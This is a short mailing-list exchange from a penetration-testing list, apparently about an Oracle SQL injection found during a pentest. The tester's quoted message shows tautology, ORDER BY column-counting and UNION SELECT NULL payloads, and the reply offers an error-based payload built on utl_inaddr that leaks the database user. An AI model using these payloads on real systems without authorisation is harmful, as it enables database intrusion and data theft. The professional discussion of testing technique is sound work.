Penetration Testing mailing list archives
Re: Oracle Pentest
From: The Dead <th3d34d () gmail com>
Date: Tue, 4 Jan 2011 19:43:58 -0200
Force the database return error to you: '||utl_inaddr.get_host_name((select user from dual))-- TH3D34D On Sat, Jan 1, 2011 at 10:48 AM, <maash.rajani () gmail com> wrote:
I found an injection point during a pentest project. They are running an Oracle DBMS. Simply tryin ' OR '1'='1' returned one single result. In trying to find the number of queries returned by the column i used: ' OR '1'='1' ORDER BY n-- Anything above 7 in the Order by query generates an error. So i assumed there were 7 columns being selected. But then when i try ' OR '1'='1' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL -- i get an incorrect number of columns error. I tried anywhere upto 30 "NULLs", i keep getting the same error. Any suggestions? ------------------------------------------------------------------------ This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org ------------------------------------------------------------------------
------------------------------------------------------------------------ This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org ------------------------------------------------------------------------
Current thread:
- Oracle Pentest maash . rajani (Jan 01)
- Re: Oracle Pentest Dan Crowley (Jan 03)
- Re: Oracle Pentest The Dead (Jan 04)